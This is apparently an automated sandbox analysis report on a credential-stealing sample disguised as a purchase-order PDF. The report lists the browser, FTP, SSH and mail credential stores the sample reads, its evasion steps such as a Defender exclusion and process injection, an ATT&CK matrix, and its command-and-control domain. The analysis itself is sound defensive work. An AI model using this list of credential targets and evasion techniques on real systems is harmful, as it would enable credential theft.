            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 8032, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: ADES_PO_Confirmation_20250307_pdf.bat.exe PID: 520, type: MEMORYSTR
            Source: Yara matchFile source: dump.pcap, type: PCAP
            Source: Yara matchFile source: 00000005.00000002.2490759003.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: PopPassword5_2_0040D069
            Source: C:\Users\user\Desktop\ADES_PO_Confirmation_20250307_pdf.bat.exeCode function: SmtpPassword5_2_0040D069
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.391dcf8.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.3937d18.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.ADES_PO_Confirmation_20250307_pdf.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1261094325.0000000003937000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1261094325.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2490346022.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1258932642.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            2
            OS Credential Dumping
            11
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
            Process Injection
            11
            Disable or Modify Tools
            2
            Credentials in Registry
            1
            Process Discovery
            Remote Desktop Protocol1
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares2
            Data from Local System
            3
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture113
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials13
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638106 Sample: ADES_PO_Confirmation_202503... Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 28 touxzw.ir 2->28 32 Suricata IDS alerts for network traffic 2->32 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 10 other signatures 2->38 8 ADES_PO_Confirmation_20250307_pdf.bat.exe 4 2->8         started        signatures3 process4 file5 26 ADES_PO_Confirmati...307_pdf.bat.exe.log, ASCII 8->26 dropped 40 Tries to steal Mail credentials (via file registry) 8->40 42 Adds a directory exclusion to Windows Defender 8->42 44 Injects a PE file into a foreign processes 8->44 12 ADES_PO_Confirmation_20250307_pdf.bat.exe 99 8->12         started        16 powershell.exe 23 8->16         started        18 ADES_PO_Confirmation_20250307_pdf.bat.exe 8->18         started        20 ADES_PO_Confirmation_20250307_pdf.bat.exe 8->20         started        signatures6 process7 dnsIp8 30 touxzw.ir 104.21.96.1, 49714, 49715, 49716 CLOUDFLARENETUS United States 12->30 46 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->46 48 Tries to steal Mail credentials (via file / registry access) 12->48 50 Tries to harvest and steal ftp login credentials 12->50 52 Tries to harvest and steal browser information (history, passwords, etc) 12->52 54 Loading BitLocker PowerShell Module 16->54 22 WmiPrvSE.exe 16->22         started        24 conhost.exe 16->24         started        signatures9 process10

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.